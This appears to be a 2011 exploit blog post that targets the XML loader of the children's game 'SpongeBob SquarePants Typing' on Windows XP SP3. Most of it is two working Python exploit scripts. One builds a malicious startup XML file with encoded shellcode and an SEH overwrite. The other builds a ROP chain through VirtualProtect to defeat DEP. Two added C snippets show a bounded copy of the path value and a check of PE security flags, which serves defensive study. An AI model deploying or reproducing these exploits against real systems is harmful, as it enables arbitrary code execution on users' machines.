08/05/2011

Playing with SpongeBob

Introduction

This post is just for fun and to show a small sign of life.

It's Sunday, the day after a night out, and I'm wondering what to do with myself. A friend, "thrashboul", had shown me a pastebin link to an exploit for SpongeBob (yes, the SpongeBob game!); since I can't find it again, I decided to rewrite it.

Problem

The problem is in the loader of the game "SpongeBob SquarePants Typing": it parses an XML file and retrieves a path from the <userPath> tag, but does not check the length of the string. As you would expect, this leads to a buffer overflow, and more precisely to an SEH overwrite.
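One way the copy of the <userPath> value could be bounded, as an added example (not the game's code and not part of the original post). The function name, the status codes, the NUL-terminated input and the 260-byte destination are assumptions; the page does not give the loader's real buffer size.

```c
#include <stdio.h>
#include <string.h>

#define USER_PATH_MAX 260 /* assumed size (MAX_PATH); the loader's real buffer size is not on the page */
enum { PATH_OK = 0, PATH_MISSING = -1, PATH_TOO_LONG = -2 };

/* Copy the <userPath> value from a NUL-terminated document into dst.
 * The value's length comes from the file, so it is measured and checked
 * against dst_size before a single byte is copied (strcpy would not). */
int extract_user_path(const char *xml, char *dst, size_t dst_size)
{
    static const char open_tag[] = "<userPath>";
    const char *start, *end;
    size_t len;

    if (dst_size == 0)
        return PATH_TOO_LONG;
    dst[0] = '\0';
    if ((start = strstr(xml, open_tag)) == NULL)
        return PATH_MISSING;
    start += sizeof open_tag - 1;
    if ((end = strstr(start, "</userPath>")) == NULL)
        return PATH_MISSING;
    len = (size_t)(end - start);
    if (len >= dst_size) /* ">=" keeps one byte for the terminator */
        return PATH_TOO_LONG;
    memcpy(dst, start, len);
    dst[len] = '\0';
    return PATH_OK;
}

/* Constructed input: a <userPath> element holding path_len filler bytes.
 * path_len must stay below 4000 so the document fits in xml[]. */
int check_sample(size_t path_len)
{
    char xml[4096] = "<startup><userPath>", dst[USER_PATH_MAX];
    size_t n = strlen(xml);

    memset(xml + n, 'A', path_len);
    memcpy(xml + n + path_len, "</userPath>", sizeof "</userPath>");
    return extract_user_path(xml, dst, sizeof dst);
}

int main(void)
{
    printf("259: %d, 260: %d, 2000: %d\n", check_sample(259),
           check_sample(260), check_sample(2000));
    return 0;
}
```

A value of exactly 260 bytes is refused as well, because the terminator would land one byte past the destination.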

I'm just going to post my 2 exploits here: one for the case where DEP is not enabled on the machine, and the other for the case where that protection is well and truly active. The targets here are Windows XP SP3 machines.

SEH overwrite without defeating DEP

#!/usr/bin/env python

from struct import pack,unpack

###########################################################################################
#                                                                                         #
# First exception occurs -------------||                                                  #
#                                     ||                                                  #
#                         |-----------||---------------|                                  #
#                        |           ||               |                                  #
#                         |           \/               \/                                 #
#      [Junk Buffer] [Next SEH]    [SE Handler]  [Shellcode]                              #
#                     jmp over    pop pop ret                                             #
#                     SE handler       |                                                  #
#                       /\            |                                                  #
#                       ||            |                                                  #
#                       ||------------|                                                  #
#                                                                                         #
###########################################################################################

f = open('salstartup.xml', 'w')

content_begin = """<?xml version="1.0" standalone="yes"?>
<startup>
  <userPath>\""""

shellcode = "\xd9\xf6\xba\x24\xb5\x20\x67\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1\x38\x31\x57\x17\x03\x57\x17\x83\xcb\x49\xc2\x92\xef\x5a\x8a\x5d\x0f\x9b\xed\xd4\xea\xaa\x3f\x82\x7f\x9e\x8f\xc0\x2d\x13\x7b\x84\xc5\xa0\x09\x01\xea\x01\xa7\x77\xc5\x92\x09\xb8\x89\x51\x0b\x44\xd3\x85\xeb\x75\x1c\xd8\xea\xb2\x40\x13\xbe\x6b\x0f\x86\x2f\x1f\x4d\x1b\x51\xcf\xda\x23\x29\x6a\x1c\xd7\x83\x75\x4c\x48\x9f\x3e\x74\xe2\xc7\x9e\x85\x27\x14\xe2\xcc\x4c\xef\x90\xcf\x84\x21\x58\xfe\xe8\xee\x67\xcf\xe4\xef\xa0\xf7\x16\x9a\xda\x04\xaa\x9d\x18\x77\x70\x2b\xbd\xdf\xf3\x8b\x65\xde\xd0\x4a\xed\xec\x9d\x19\xa9\xf0\x20\xcd\xc1\x0c\xa8\xf0\x05\x85\xea\xd6\x81\xce\xa9\x77\x93\xaa\x1c\x87\xc3\x12\xc0\x2d\x8f\xb0\x15\x57\xd2\xde\xe8\xd5\x68\xa7\xeb\xe5\x72\x87\x83\xd4\xf9\x48\xd3\xe8\x2b\x2d\x2b\xa3\x76\x07\xa4\x6a\xe3\x1a\xa9\x8c\xd9\x58\xd4\x0e\xe8\x20\x23\x0e\x99\x25\x6f\x88\x71\x57\xe0\x7d\x76\xc4\x01\x54\x15\xd0\xa1\x20\xb3\x4a\x3e\xa0\x34\xe1\xe2\x4d\xc2\x76\x6f\xd7\x59\x4b\xbd\x4b\xc1\xca\xad\x10\x2b\x69\x56\xb2\x33"

junk = 'Z' * 1024

spled = "\x90" * 1000

jump_6 = "\xeb\x06\x90\x90"
pop_pop_ret = pack("<I", 0x21134E57) # pop pop ret from mss32.dll (/SAFESEH:NO)

content_end = """\"</userPath>
  <cdName>"SpongeBob SquarePants Typing"</cdName>
  <cdAge>7-10</cdAge>
  <music>1000</music>
  <pdfInstaller>"C:\wtf\Nouveau dossier\INSTALL\ACROBAT\Ver50\Acrobat Reader 5 Installer.exe"</pdfInstaller>
  <signin>
    <execute>yes</execute>
    <style>tlc</style>
    <age>4To6</age>
    <rscFile>default</rscFile>
  </signin>
  <disk1>
    <filename>"C:\wtf\Nouveau dossier\TLC\383167-CD"</filename>
    <cdName>"SpongeBob SquarePants Typing"</cdName>
  </disk1>
  <screenRSC>salstartup.rsc</screenRSC>
  <screen>
    <element>
      <condition>all</condition>
      <type>scene</type>
      <id>9100</id>
    </element>
    <element>
      <condition>all</condition>
      <type>toon</type>
      <x>0</x>
      <y>0</y>
      <id>9100</id>
      <startFrame>1</startFrame>
    </element>
    <mainPlayButton>
      <condition>all</condition>
      <type>fob</type>
      <class>play</class>
      <cdCheck>disk1</cdCheck>
      <target>"C:\Program Files\The Learning Company\SpongeBob SquarePants Typing\SPT.exe"</target>
      <postLaunch>wait</postLaunch>
      <x>461</x>
      <y>60</y>
      <id>9124</id>
    </mainPlayButton>
    <helpButton>
      <condition>all</condition>
      <type>fob</type>
      <class>extension</class>
      <cdCheck></cdCheck>
      <target>"C:\Program Files\The Learning Company\SpongeBob SquarePants Typing\User&apos;s Guide.pdf"</target>
      <parameters></parameters>
      <postLaunch>wait</postLaunch>
      <x>543</x>
      <y>158</y>
      <id>9126</id>
    </helpButton>
    <uninstallButton>
      <condition>all</condition>
      <type>fob</type>
      <class>uninstall</class>
      <target>C:\WINDOWS\TLCUninstall.exe</target>
      <parameters>-l</parameters>
      <crc>"C:\Program Files\The Learning Company\SpongeBob SquarePants Typing\Uninstall.xml"</crc>
      <postLaunch>exit</postLaunch>
      <x>514</x>
      <y>373</y>
      <id>9125</id>
    </uninstallButton>
    <onlineButton>
      <condition>all</condition>
      <type>fob</type>
      <class>link</class>
      <cdCheck></cdCheck>
      <target>http://redirect.expressit.com/redirect.asp?resku=383167&amp;action_id=Launcher</target>
      <parameters></parameters>
      <postLaunch>wait</postLaunch>
      <x>538</x>
      <y>263</y>
      <yy>375</yy>
      <id>9130</id>
    </onlineButton>
    <EregButton>
      <condition>all</condition>
      <type>fob</type>
      <class>install</class>
      <cdCheck></cdCheck>
      <target>"C:\Program Files\The Learning Company\SpongeBob SquarePants Typing\ereg\ereg32.exe"</target>
      <parameters></parameters>
      <postLaunch>wait</postLaunch>
      <x>522</x>
      <y>324</y>
      <id>9129</id>
    </EregButton>
    <SellScreen>
      <condition>all</condition>
      <type>fob</type>
      <class>link</class>
      <cdCheck>disk1</cdCheck>
      <target>startup:startup/BrandingPage</target>
      <parameters></parameters>
      <postLaunch>wait</postLaunch>
      <x>543</x>
      <y>207</y>
      <id>9128</id>
    </SellScreen>
  </screen>
  <BrandingPage>
    <element>
      <condition>all</condition>
      <type>toon</type>
      <id>5000</id>
    </element>
    <screenSaverButton>
      <condition>all</condition>
      <type>fob</type>
      <class>install</class>
      <cdCheck>disk1</cdCheck>
      <target>"C:\wtf\Nouveau dossier\SailorificStuff\sbscreen_setup.exe"</target>
      <parameters></parameters>
      <postLaunch>wait</postLaunch>
      <x>546</x>
      <y>188</y>
      <id>5054</id>
    </screenSaverButton>
    <backButton>
      <condition>all</condition>
      <type>fob</type>
      <class>link</class>
      <target>startup:startup/screen</target>
      <x>537</x>
      <y>263</y>
      <id>5055</id>
    </backButton>
  </BrandingPage>
  <sysReq>
    <execute>yes</execute>
    <pc>
      <processor>
        <family>pentium</family>
        <speed>266</speed>
        <msgType>warn</msgType>
        <msgText>"266 MHz Pentium or faster is recommended."</msgText>
      </processor>
      <os>
        <Win95>no</Win95>
        <Win98>yes</Win98>
        <WinMe>yes</WinMe>
        <WinNT4>no</WinNT4>
        <Win2000>yes</Win2000>
        <WinXP>yes</WinXP>
        <msgType>warn</msgType>
        <msgText>"You operating system is not supported. Play at your own risk!"</msgText>
      </os>
      <diskSpace>
        <mbAvailable>100</mbAvailable>
        <msgType>ignore</msgType>
        <msgText>"There is not enough hard disk space available to play!"</msgText>
      </diskSpace>
      <physicalRAM>
        <mbAvailable>64</mbAvailable>
        <msgType>warn</msgType>
        <msgText>"There is not enough RAM available to play!"</msgText>
      </physicalRAM>
      <availableRAM>
        <mbAvailable>64</mbAvailable>
        <msgType>warn</msgType>
        <msgText>You are low on memory!</msgText>
      </availableRAM>
      <display>
        <width>800</width>
        <height>600</height>
        <bits>16</bits>
        <msgType>fail</msgType>
        <msgText>"Your display is not capable of 800 x 600 16-bit, thousands of colors."</msgText>
      </display>
      <sound>
        <msgType>fail</msgType>
        <msgText>"WAVE driver is not available."</msgText>
      </sound>
    </pc>
    <mac>
      <processor>
        <family>ppc</family>
        <speed>233</speed>
        <msgType>warn</msgType>
        <msgText>"233 MHz Powerpc or faster is recommended."</msgText>
      </processor>
      <os>
        <minVersion>0860</minVersion>
        <msgType>fail</msgType>
        <msgText>"You must run System 8.6 or above!"</msgText>
      </os>
      <osX>
        <minVersion>1004</minVersion>
        <msgType>fail</msgType>
        <msgText>"You must run OSX 10.04 or above!"</msgText>
      </osX>
      <diskSpace>
        <mbAvailable>100</mbAvailable>
        <msgType>ignore</msgType>
        <msgText>"There is not enough hard disk space available to play!"</msgText>
      </diskSpace>
      <physicalRAM>
        <mbAvailable>64</mbAvailable>
        <msgType>warn</msgType>
        <msgText>"There is not enough RAM available to play!"</msgText>
      </physicalRAM>
      <availableRAM>
        <mbAvailable>0</mbAvailable>
        <msgType>warn</msgType>
        <msgText></msgText>
      </availableRAM>
      <colorDepth>
        <minBits>16</minBits>
        <msgType>warn</msgType>
        <msgText>"Your display is not capable of 16-bit, thousands of colors."</msgText>
      </colorDepth>
      <sound>
        <available>ignore</available>
        <msgType>ignore</msgType>
        <msgText></msgText>
      </sound>
    </mac>
  </sysReq>
</startup>"""


f.write(content_begin + junk + jump_6 + pop_pop_ret + shellcode + spled  + content_end)

SEH overwrite using ROP

Here I removed all the XML and kept only the fun part, that is, everything that lets me pivot my stack, plus the ROP chain that generates the parameters for a call to VirtualProtect() in order to make the memory region holding my shellcode PAGE_EXECUTE_READWRITE.

#!/usr/bin/env python

from struct import pack,unpack

shellcode = "\xd9\xf6\xba\x24\xb5\x20\x67\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1\x38\x31\x57\x17\x03\x57\x17\x83\xcb\x49\xc2\x92\xef\x5a\x8a\x5d\x0f\x9b\xed\xd4\xea\xaa\x3f\x82\x7f\x9e\x8f\xc0\x2d\x13\x7b\x84\xc5\xa0\x09\x01\xea\x01\xa7\x77\xc5\x92\x09\xb8\x89\x51\x0b\x44\xd3\x85\xeb\x75\x1c\xd8\xea\xb2\x40\x13\xbe\x6b\x0f\x86\x2f\x1f\x4d\x1b\x51\xcf\xda\x23\x29\x6a\x1c\xd7\x83\x75\x4c\x48\x9f\x3e\x74\xe2\xc7\x9e\x85\x27\x14\xe2\xcc\x4c\xef\x90\xcf\x84\x21\x58\xfe\xe8\xee\x67\xcf\xe4\xef\xa0\xf7\x16\x9a\xda\x04\xaa\x9d\x18\x77\x70\x2b\xbd\xdf\xf3\x8b\x65\xde\xd0\x4a\xed\xec\x9d\x19\xa9\xf0\x20\xcd\xc1\x0c\xa8\xf0\x05\x85\xea\xd6\x81\xce\xa9\x77\x93\xaa\x1c\x87\xc3\x12\xc0\x2d\x8f\xb0\x15\x57\xd2\xde\xe8\xd5\x68\xa7\xeb\xe5\x72\x87\x83\xd4\xf9\x48\xd3\xe8\x2b\x2d\x2b\xa3\x76\x07\xa4\x6a\xe3\x1a\xa9\x8c\xd9\x58\xd4\x0e\xe8\x20\x23\x0e\x99\x25\x6f\x88\x71\x57\xe0\x7d\x76\xc4\x01\x54\x15\xd0\xa1\x20\xb3\x4a\x3e\xa0\x34\xe1\xe2\x4d\xc2\x76\x6f\xd7\x59\x4b\xbd\x4b\xc1\xca\xad\x10\x2b\x69\x56\xb2\x33"

junk = 'Z' * (1000 - len(shellcode) - 0x17)

junk += shellcode

junk += "Z" * 0x17

junk += pack("<I", 0x7C97A1A8) # 0x7C97A1A8 :  {POP}  # PUSH ESP # ADD BH,BH # DEC ECX # POP EAX # POP EBP # RETN 4       [Module : ntdll.dll]  ** 

junk += "Z" * 4

junk += pack("<I", 0x77EA9C3E)  # 0x77EA9C3E :  {POP}  # ADD EAX,0E # POP ESI # POP EBP # RETN 8  [Module : RPCRT4.dll]  ** 

junk += 'Z' * 12

junk += pack("<I", 0x77BED8A9) # 0x77BED8A9 :  # SUB EAX,20 # POP EBP # RETN      [Module : msvcrt.dll]  ** 

junk += pack("<I", 0x2112BF80) # SEH HANDLER # 0x2112BF80 : 800  :         # ADD ESP,800 # RETN - mss32.dll -  ** 

junk += "Z" * 8

for i in range(1, 9):
        junk += pack("<I", 0x77BED8A9) # 0x77BED8A9 :  # SUB EAX,20 # POP EBP # RETN      [Module : msvcrt.dll]  ** 
        junk += "Z" * 4
        
junk += pack("<I", 0x7C81E6D9) # 0x7C81E6D9 :  # MOV EDI,EAX # RETN       [Module : kernel32.dll]  **

junk += pack("<I", 0x77BED8A9) # 0x77BED8A9 :  # SUB EAX,20 # POP EBP # RETN      [Module : msvcrt.dll]  ** 
junk += "Z" * 4
junk += pack("<I", 0x77BED8A9) # 0x77BED8A9 :  # SUB EAX,20 # POP EBP # RETN      [Module : msvcrt.dll]  ** 
junk += "Z" * 4

junk += pack("<I", 0x7C97A1A8) # 0x7C97A1A8 :  {POP}  # PUSH ESP # ADD BH,BH # DEC ECX # POP EAX # POP EBP # RETN 4       [Module : ntdll.dll]  ** 
junk += "Z" * 4

junk += pack("<I", 0x7759156D) # 0x7759156D :  # INC ESI # PUSH EAX # POP ESI # RETN      [Module : ole32.dll]  ** 

junk += "Z" * 4

junk += pack("<I", 0x77BEE842) # 0x77BEE842 :  {POP}  # PUSH EDI # POP EAX # POP EBP # RETN       [Module : msvcrt.dll]  ** 

junk += "Z" * 4

junk += pack("<I", 0x58BB8E2A) # 0x58BB8E2A :  # MOV DWORD PTR DS:[ESI+84],EAX # MOV EAX,ESI # POP ESI # RETN     [Module : COMCTL32.dll]  **  

junk += "Z" * 4

junk += pack("<I", 0x774F5103) # 0x774F5103 :  # ADD EAX,4 # RETN         [Module : ole32.dll]  ** 

junk += pack("<I", 0x7759156D) # 0x7759156D :  # INC ESI # PUSH EAX # POP ESI # RETN      [Module : ole32.dll]  ** 

junk += pack("<I", 0x77BEE842) # 0x77BEE842 :  {POP}  # PUSH EDI # POP EAX # POP EBP # RETN       [Module : msvcrt.dll]  ** 

junk += "Z" * 4

junk += pack("<I", 0x58BB8E2A) # 0x58BB8E2A :  # MOV DWORD PTR DS:[ESI+84],EAX # MOV EAX,ESI # POP ESI # RETN     [Module : COMCTL32.dll]  **  

junk += "Z" * 4

junk += pack("<I", 0x774F5103) # 0x774F5103 :  # ADD EAX,4 # RETN         [Module : ole32.dll]  **  

junk += pack("<I", 0x7759156D) # 0x7759156D :  # INC ESI # PUSH EAX # POP ESI # RETN      [Module : ole32.dll]  **

#junk += pack("<I", 0x7752E074) # 0x7752E074 :  # XOR EAX,EAX # ADD EAX,328 # RETN  [Module : ole32.dll]  ** 

junk += pack("<I", 0x77C241E1) # 0x77C241E1 :  # XOR EAX,EAX # RETN       [Module : msvcrt.dll]  ** 

junk += pack("<I", 0x775A1457) # 0x775A1457 :  # ADD EAX,23C # RETN       [Module : ole32.dll]  ** 

junk += pack("<I", 0x58BB8E2A) # 0x58BB8E2A :  # MOV DWORD PTR DS:[ESI+84],EAX # MOV EAX,ESI # POP ESI # RETN     [Module : COMCTL32.dll]  ** 

junk += "Z" * 4 
        
junk += pack("<I", 0x774F5103) # 0x774F5103 :  # ADD EAX,4 # RETN         [Module : ole32.dll]  **                

junk += pack("<I", 0x7759156D) # 0x7759156D :  # INC ESI # PUSH EAX # POP ESI # RETN      [Module : ole32.dll]  **

junk += pack("<I", 0x77C241E1) # 0x77C241E1 :  # XOR EAX,EAX # RETN       [Module : msvcrt.dll]  **

junk += pack("<I", 0x77C1EC1D) # 0x77C1EC1D :  # ADD EAX,40 # POP EBP # RETN      [Module : msvcrt.dll]  ** 

junk += "Z" * 4

junk += pack("<I", 0x58BB8E2A) # 0x58BB8E2A :  # MOV DWORD PTR DS:[ESI+84],EAX # MOV EAX,ESI # POP ESI # RETN     [Module : COMCTL32.dll]  ** 
 
for i in range(1, 8):
        junk += pack("<I", 0x77C241E1) # 0x77C241E1 :  # XOR EAX,EAX # RETN       [Module : msvcrt.dll]  ** 

params = pack("<I", 0x7C801AD4) # 0x7C801AD4 : VirtualProtect()
params = params + "OSEF"
params = params + "OSEF"
params = params + "OSEF"
params = params + "OSEF"
params = params + pack("<I",0x2114d010)


nops = '\x90' * 900


payload = junk + params + nops

# f, content_begin and content_end are the ones from the first script (the XML is omitted here)
f.write(content_begin + payload + content_end)
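Both scripts depend on hard-coded module addresses, and the first one notes that mss32.dll was linked with /SAFESEH:NO. As an added example (not part of the original post), this C sketch reads the DllCharacteristics field of a PE header so the modules an application ships can be audited for /NXCOMPAT and /DYNAMICBASE. The function names and the sample header are constructed for illustration, and the SafeSEH table itself, which lives in the load configuration directory, is not parsed here.

```c
#include <stdio.h>
#include <string.h>

/* DllCharacteristics bits from the PE optional header (winnt.h values). */
#define DLLCHAR_DYNAMIC_BASE 0x0040u /* /DYNAMICBASE: image may be relocated (ASLR) */
#define DLLCHAR_NX_COMPAT    0x0100u /* /NXCOMPAT: image is marked DEP-compatible */
#define DLLCHAR_NO_SEH       0x0400u /* image declares that it uses no SEH */

static unsigned rd16(const unsigned char *p) { return p[0] | (unsigned)p[1] << 8; }
static unsigned long rd32(const unsigned char *p) { return rd16(p) | (unsigned long)rd16(p + 2) << 16; }

/* Return the DllCharacteristics word of a PE image, or -1 if buf is not a
 * well-formed PE32/PE32+ header. Every offset is bounds-checked first. */
long pe_dll_characteristics(const unsigned char *buf, size_t len)
{
    unsigned long pe;

    if (len < 0x40 || buf[0] != 'M' || buf[1] != 'Z')
        return -1;
    pe = rd32(buf + 0x3c);                  /* e_lfanew */
    if (pe > len || len - pe < 24 + 72)     /* signature + COFF header + field at +70 */
        return -1;
    if (memcmp(buf + pe, "PE\0\0", 4) != 0 || rd16(buf + pe + 20) < 72)
        return -1;                          /* bad signature or SizeOfOptionalHeader */
    if (rd16(buf + pe + 24) != 0x10b && rd16(buf + pe + 24) != 0x20b)
        return -1;                          /* neither PE32 nor PE32+ */
    return (long)rd16(buf + pe + 24 + 70);  /* same offset in both formats */
}

/* Constructed sample: a minimal PE32 header carrying the given flags. */
long sample_flags(unsigned dllchar)
{
    unsigned char img[0x100] = { 'M', 'Z' };
    img[0x3c] = 0x80;                       /* e_lfanew = 0x80 */
    memcpy(img + 0x80, "PE\0\0", 4);
    img[0x80 + 20] = 0xe0;                  /* SizeOfOptionalHeader = 224 */
    img[0x80 + 24] = 0x0b;                  /* magic 0x10b (PE32), low byte */
    img[0x80 + 25] = 0x01;
    img[0x80 + 24 + 70] = (unsigned char)(dllchar & 0xff);
    img[0x80 + 24 + 71] = (unsigned char)(dllchar >> 8);
    return pe_dll_characteristics(img, sizeof img);
}

int main(void)
{
    long dc = sample_flags(0); /* a module built with none of the flags */
    printf("NX_COMPAT=%d DYNAMIC_BASE=%d NO_SEH=%d\n", (dc & DLLCHAR_NX_COMPAT) != 0,
           (dc & DLLCHAR_DYNAMIC_BASE) != 0, (dc & DLLCHAR_NO_SEH) != 0);
    return 0;
}
```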

Have fun :].